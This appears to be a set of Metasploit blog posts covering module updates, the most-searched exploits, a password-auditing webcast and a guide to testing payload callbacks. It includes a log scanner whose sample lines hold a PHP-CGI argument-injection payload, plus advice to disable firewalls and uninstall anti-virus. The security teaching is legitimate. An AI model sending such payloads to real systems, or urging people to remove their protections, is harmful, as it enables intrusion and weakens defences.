             ldc.i4 0x40020004
seg000:2C4DD Ardence.CRemoteManagedVdisk.handleGetObjectsRequest
             ldc.i4 0x40020006
seg000:2C89D Ardence.CRemoteManagedVdisk.handleGetFooterRequest
             ldc.i4 0x40020002
seg000:2CBED Ardence.CRemoteManagedVdisk.handleGetHeaderRequest
             ldc.i4 0x40020000
seg000:2CF4D Ardence.CRemoteManagedVdisk.handleListRequest
             ldc.i4 0x4002000E
seg000:2D2ED Ardence.CRemoteManagedVdisk.handleListDirectoriesRequest
             ldc.i4 0x40020019
seg000:2D68D Ardence.CRemoteManagedVdisk.handleCreateDirectoryRequest
             ldc.i4 0x4002001A
seg000:2D9FD Ardence.CRemoteManagedVdisk.handleRemoveDirectoryRequest
             ldc.i4 0x4002001B
seg000:2DD6D Ardence.CRemoteManagedVdisk.handleLockRequest
             ldc.i4 0x40020010
seg000:2E0CD Ardence.CRemoteManagedVdisk.handleUnlockRequest
             ldc.i4 0x40020011
seg000:2E41D Ardence.CRemoteManagedVdisk.handleCheckRequest
             ldc.i4 0x40020015
seg000:2E586 Ardence.CRemoteManagedVdisk.handleCheckRequest
             ldc.i4 0x40020015
seg000:2E69D Ardence.CRemoteManagedVdisk.handleIsLockedRequest
             ldc.i4 0x40020013
seg000:2E91D Ardence.CRemoteManagedVdisk.handleReleaseAllLocksRequest
             ldc.i4 0x40020012
seg000:2EC5D Ardence.CRemoteManagedVdisk.handleGetLockInfoRequest
             ldc.i4 0x40020014
seg000:2EFED Ardence.CRemoteManagedVdisk.handleSetFooterRequest
             ldc.i4 0x40020003
seg000:2F27D Ardence.CRemoteManagedVdisk.handleSetHeaderRequest
             ldc.i4 0x40020001
seg000:2F50D Ardence.CRemoteManagedVdisk.handleSetBootRecordRequest
             ldc.i4 0x40020005
seg000:2F9DD Ardence.CRemoteManagedVdisk.handleCheckFreeSpaceRequest
             ldc.i4 0x40020016
seg000:2FB50 Ardence.CRemoteManagedVdisk.handleCheckFreeSpaceRequest
             ldc.i4 0x40020016
seg000:2FC6D Ardence.CRemoteManagedVdisk.handleCheckSidecarRequest
             ldc.i4 0x40020017
seg000:2FEB9 Ardence.CRemoteManagedVdisk.handleCheckSidecarRequest
             ldc.i4 0x40020017
seg000:2FFCD Ardence.CRemoteManagedVdisk.handleDeleteDeviceDiskCacheFile
             ldc.i4 0x40020018

 

It's quite likely there are more crashes lurking in the code base, so fuzzing out a few more is left as an exercise to the reader.

When Hashes Collide

 

It's not often one module references four different CVEs across two different web technologies, but this week's update features just that: the Hashtable Collisions module submitted by Christian Mehlmauer, which incorporates his work along with Alexander Klink, Julian Waelde, Scott A. Crosby, Dan S. Wallach, and Krzysztof Kotowicz. The most complete reference about this vulnerability can be found over on oCERT, but the short story is, this module exercises an "algorithmic complexity" vulnerability in the way some (most) web application frameworks generate hash tables based on POST requests. Ultimately, vulnerable sites can end up eating hours of CPU time in the face of just a few requests, making for a classical asymmetric DoS condition. While this module may not have a lot of use in the course of a normal penetration testing engagement, it illustrates the kind of nifty research avenues that Metasploit modules can lend themselves to.

 

Rails Version Shuffle

 

As you may or may not know, both Metasploit Framework and Metasploit Pro ship with Ruby on Rails as a core component. This last week, there was a SQL injection vulnerability announced that affects versions prior to 3.2.4. Although a code review showed that none of the Metasploit products were affected by the vulnerability, we updated to 3.2.4 with a better-safe-than-sorry attitude. Well, it turns out, 3.2.4 contained a show-stopper regression as well as the security fix. Given that we're not vulnerable to begin with, we've rolled back to 3.2.2 until we get a chance to test 3.2.5 more thoroughly (once bitten and all).

 

So, for those of you who track Metasploit changes via SVN or GitHub, that's why we've been shuffling around our Rails versions this week. Sorry for the commit spam!

 

Other New Modules with Links to our Exploit Database (DB)

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Exploit Database (DB)

Last month, we gave you a list of the top 10 most searched Metasploit exploit and auxiliary modules from our exploit database (DB). These stats are collected by analyzing searches on metasploit.com in our webserver logs, not through usage of Metasploit, which we do not track for privacy reasons.

 

We were curious how the list changed month over month, and now we have the first results for May 2012. As expected, most exploits only moved around a little, but we also have 2 fun new entries. Here they are, annotated with Tod Beardsley's excellent comments:

 

  1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Up 1 place from #2 since last month.

  2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down 1 place from #1 since last month.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six-year-old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft’s Security TechCenter. Same position as last month.

  4. CCTV DVR Login Scanning Utility: This auxiliary module rocketed to the top ten list with our recent guest blog post by Justin Cacak. The module scans for CCTV DVR video surveillance deployments by CTRing, MicroDigital, HIVISION, and a bunch of other rebranded devices. The module targets port 5920, which a lot of CCTV owners might not even realize is open, and tries default credentials (as well as optionally allowing more thorough bruteforcing). Since Justin's research and this module were picked up by Slashdot, Wired, and other tech news outlets, it's not surprising to see it hit the top 10 list. New entry this month.

  5. PHP CGI Argument Injection: This module from mid-May of 2012 exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installations, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. New entry this month.

  6. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine-year-old vulnerability that used to be the de facto standard exploit for Windows machines - this is the RPC DCOM bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Down 2 places from #4 since last month.

  7. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. More info on that at The H Security. Down 2 places from #5 since last month.

  8. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic at the National Vulnerability Database. Down 2 places from #6 since last month.

  9. Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425): Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular. More info on that at Technolyze Blogs. Down 2 places from #7 since last month.

  10. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic at the National Vulnerability Database. Down 1 place from #9 since last month.
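The PHP-CGI entry above turns on one detail worth knowing when you go looking for it in web server logs: under the CGI specification, a query string with no literal "=" is handed to the CGI program as command-line arguments, which is how a request such as ?-s reached php-cgi as the -s switch, and why attackers percent-encoded any "=" they needed (%3d) so the raw query still contained none. The following is an added example, not code from the post or from Metasploit, that scans Apache-style access log lines for that pattern. The log lines, client IPs and function names are constructed here for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access log lines for the example (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2012:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2012:12:00:02 +0000] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "curl/7.21.0"
10.0.0.9 - - [10/May/2012:12:00:03 +0000] "POST /index.php?%2d%64+allow_url_include%3d1+%2d%64+auto_prepend_file%3dphp://input HTTP/1.1" 200 88 "-" "curl/7.21.0"
10.0.0.7 - - [10/May/2012:12:00:04 +0000] "GET /search.php?q=-s HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP plus the request line of a combined-format entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_php_cgi_argv_injection(target):
    """True if the request target would reach php-cgi as command-line switches.

    An "indexed" query string (no literal '=') is passed to the CGI program
    as argv. A literal '=' anywhere in the raw query means an ordinary
    name=value query and is never flagged; only after the server decodes
    %2d / '+' do the smuggled switches such as -s or -d appear.
    """
    if "?" not in target:
        return False
    _path, raw_query = target.split("?", 1)
    if not raw_query or "=" in raw_query:
        return False
    decoded = unquote_plus(raw_query)  # '+' -> space, %2d -> '-', %3d -> '='
    return any(tok.startswith("-") for tok in decoded.split())


def find_suspicious(log_text):
    """Return (ip, method, target) for every line that looks like CVE-2012-1823 abuse."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_php_cgi_argv_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("method"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, method, target in find_suspicious(SAMPLE_LOG):
        print("%s %s %s" % (ip, method, target))
```

Run it over a real log with find_suspicious(open(path).read()). A hit on a host that actually serves PHP through mod_cgi or FastCGI is the one to chase; mod_php never receives argv, so the same request is harmless there, and the fourth sample line shows that a "-" inside a normal name=value parameter is not flagged.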

 

Do you have your own theory on why the exploits are trending the way they are? If so, please let us know in the comments below.

 

If you want to use any of these exploits right now, you can download Metasploit for free!

David Maloney's webcast for network administrators and security engineers is now available online. David discusses weaknesses in password-based authentication on clients and servers and how to audit these as part of a regular security program.

 

What you'll learn in this webcast

 

  • Password storage systems and password obfuscation
  • Strengths and weaknesses of the various approaches
  • Real-life examples of badly implemented password authentication mechanisms
  • How to audit passwords on your network using Metasploit Pro

 

Audience questions answered in this webcast

 

  • What do you think about modifying standard ciphers, for example MD5 constants or AES S-boxes?
  • Do you know if Putty saves its sessions in a secure way?
  • Which FTP and SSH applications have good password protection?
  • Do you know about password security issues with popular VPN clients?
  • I know of a password that many people in my environment are using. Is there a way to audit my network for just that password?
  • Which Metasploit editions is the scheduled password auditing available in?
  • You mentioned basic HTTP Authentication. Which method should I use?
  • Were all the hashes you cracked LM hashes?
  • Can you expand a little on the registry areas that usually contain passwords?
  • What are the differences between Metasploit Community and Metasploit Pro? Is it only the graphical user interface? Or am I able to run more exploits or zero-day exploits?
  • What are your thoughts on browsers that save credentials for future use?

 

About David Maloney

 

David is a Software Engineer on Rapid7’s Metasploit team, where he is responsible for development of core features for the commercial Metasploit editions. Before Rapid7, he worked as a Security Engineer and Penetration Tester at Time Warner Cable and as an Application Security Specialist for a global insurance company. David has been a long-time community contributor to the Metasploit Framework. He is one of the founders of Hackerspace Charlotte and is an avid locksport enthusiast.

 

View the Password Auditing Webcast Now

It can be very frustrating to try to exploit machines and not succeed, especially if your vulnerability report is showing a lot of vulnerabilities on the hosts you are trying to exploit. This is usually due to one of the following reasons:

 

  1. Not all reported vulnerabilities are exploitable. It may be because a firewall or IPS/IDS is successfully stopping the attack, or simply because your vulnerability scanner reported a false positive.
  2. Your Metasploit machine or network connection may prohibit a session from being opened.

 

If you think the latter may be the case, please ensure the following:

 

  1. The firewall on your Metasploit machine must let the payload connect back after an exploit succeeds. The default port for this connection is 4444. For this test the simplest option is to disable the host firewall; otherwise, at least allow inbound connections on the listener port.
  2. Disable (or, better, uninstall) any anti-virus software before installing Metasploit. Metasploit ships the same kind of exploit code and payloads that malware uses, so some anti-virus products quarantine its files and break the installation.

 

If you have checked all of the above but still cannot get a session, verify that your Metasploit installation is set up so that a Metasploit payload can actually connect back after a machine has been exploited. To do this, we'll launch a small executable on the target machine that connects back to Metasploit to create a session. If this test succeeds, you'll know that no firewall or configuration issue is stopping the payload from connecting back to Metasploit. This test requires Metasploit Pro; if you don't have this version, register for a 7-day Metasploit Pro trial to run it.

 

For this test, I'll be using two machines:

 

Metasploit host: 10.1.95.74, Ubuntu (for this test; Windows also works)
  • Runs Metasploit Pro

Target host: 10.1.95.59, Windows (required for testing with ClickMe.exe)
  • Target host for the test
  • Use a browser to connect to the Metasploit host
  • Download and execute ClickMe.exe here

 

The little executable we'll be using is usually used for USB campaigns, which involve dropping USB keys in your target's parking lot and bathroom to see if anyone will plug the USB thumb drive into their machine and double-click the executable. While it was built for a different purpose, it will work just fine to test the inbound connection to Metasploit.

 

Here's how to test:

 

  1. The easiest way to get the executable to your test machine is to download it through the browser, so go to the Windows target machine and enter "https://" plus the IP address of the Metasploit machine on port 3790; in this example the link is https://10.1.95.74:3790. If you cannot connect from the target to the Metasploit machine, find out why: this may be the reason you are not getting sessions.
  2. Since the SSL certificate is self-signed, you'll get a warning that it isn't trusted. Add an exception to allow this certificate to proceed.
  3. Log in.
  4. Create a new project or enter a test project that you've already set up.
  5. Click on the Campaigns button.
  6. Click on New Campaign.
  7. Enter Test as the name for the campaign and the IP address of the Metasploit host in the field "Listener Bind IP".
    [Screenshot: Listener Bind IP]
  8. Activate the checkbox "Generate an executable for manual delivery".
    [Screenshot: USB Drive Campaign]
  9. Ensure that the "Listener callback IP" also uses the Metasploit host's IP address.
    [Screenshot: Payload settings]
  10. Save the campaign.
  11. Click on Start Campaign. The campaign settings should now look like this:
    [Screenshot: Campaign settings]
  12. Click on Download Executable and download "ClickMe.exe" to the Windows host.
  13. Open and run "ClickMe.exe" on the Windows host. The file will execute but you will not see any user interface.
  14. Return to the browser on the Windows machine and click on the Sessions tab. You should now see an open session. Note also the 1 in a blue circle next to the Sessions tab, indicating one active session.
    [Screenshot: Successful session]

 

If you've successfully opened a session, your Metasploit host is correctly configured to receive connections from exploited machines.

 

If you are not getting a session on the machine, here are a couple of things you can try to identify the issue:


  • On the Metasploit host, check if the Metasploit service is listening on port 4444. On Ubuntu, open the terminal window and type netstat -an | grep 4444. The response should be:
    [Screenshot: netstat output showing a socket in the LISTEN state on port 4444]
    If the Metasploit host is not listening, please ensure that the campaign is really started.
  • Verify that no firewall is active on the Metasploit host
  • Verify that no anti-virus is active on the Metasploit host
  • If you are having trouble executing the ClickMe.exe file, then you may have anti-virus blocking execution on the target machine. Disable AV, download the file and try again. Turn AV back on once you have completed the test.
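The netstat and firewall checks above only look at the Metasploit side. The quickest way to tell a dropped connection (a firewall somewhere on the path) from a missing listener (campaign not actually started) is a plain TCP connect from the target toward the handler port, which you can run before involving ClickMe.exe at all. This is an added example rather than anything shipped with Metasploit or Metasploit Pro; it assumes Python 3 on the target, uses the walkthrough's 10.1.95.74 and port 4444 as defaults, and includes a throwaway local listener only so the probe can be exercised without a Metasploit host.

```python
import socket
import sys
import threading
from contextlib import closing

# Defaults taken from the walkthrough: the Metasploit host and its default handler port.
HANDLER_HOST = "10.1.95.74"
HANDLER_PORT = 4444


def probe_handler(host, port, timeout=3.0):
    """TCP-connect toward the handler and classify the outcome.

    Returns (reachable, verdict). The verdict separates the two failure modes
    the checklist covers: a timeout means something on the path (host firewall,
    network filter) is silently dropping packets; a refusal means the host
    answered but nothing is bound to the port, i.e. the campaign or handler
    is not actually started.
    """
    try:
        with closing(socket.create_connection((host, port), timeout=timeout)):
            return True, "connected: handler port %d on %s is reachable" % (port, host)
    except socket.timeout:
        return False, "timed out: packets dropped, check firewalls on the host and path"
    except ConnectionRefusedError:
        return False, "refused: host up but nothing listening, is the campaign started?"
    except OSError as exc:
        return False, "error: %s" % exc


def start_stub_listener(host="127.0.0.1", port=0):
    """Stand-in for the Pro handler so the probe can be tested without Metasploit.

    Binds to the given port (0 picks a free one) and accepts and immediately
    closes connections in a background thread. Returns (server_socket, bound_port).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    bound_port = srv.getsockname()[1]

    def accept_loop():
        try:
            while True:
                conn, _ = srv.accept()
                conn.close()
        except OSError:
            pass  # server socket closed; stop accepting

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, bound_port


def closed_local_port(host="127.0.0.1"):
    """Reserve and release a free port so a probe against it is refused, not filtered."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # On the target: python probe.py 10.1.95.74 4444
    host = sys.argv[1] if len(sys.argv) > 1 else HANDLER_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else HANDLER_PORT
    ok, verdict = probe_handler(host, port)
    print(verdict)
    sys.exit(0 if ok else 1)
```

A "refused" verdict with the campaign showing as started usually means the listener bound to a different address than the one you are probing (compare the Listener Bind IP with the netstat output); a "timed out" verdict points back at the firewall items in the list above.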

 

If you're still having trouble getting Metasploit to work, please post your question in the Metasploit discussion forums (posting requires login/registration).
